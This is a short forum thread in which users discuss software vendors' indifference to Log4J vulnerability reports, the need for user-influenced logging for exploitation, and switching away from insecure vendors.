[I_Am_Nous]

Apathy is definitely the issue. Sometimes you tell a vendor about an issue and they say their app doesn't use Log4J even though it's gobbling up the Log4J test script in the username field...they don't want to care, so you can't make them.

[bzzzt]

Maybe they only use the log4j test script ;)

Or maybe someone had to run some scanning tool which reported 'no vulnerabilities'.

Exploiting log4j requires logging to be influenced by user input. Even if an application includes a vulnerable log4j but doesn't bother to log anything there's zero risk. In that case apathy saved you ;)

[ddol]

Knowing that a vendor you selected is mishandling your users data and doesn’t care to secure their systems is unacceptable.

Time to find a new vendor, as your continued usage of their unsecured services is now a liability.

[bzzzt]

Welcome in the world of enterprise software where you don't get to choose what software you use and your company doesn't care.

[I_Am_Nous]

Luckily they aren't our vendor. But I agree completely.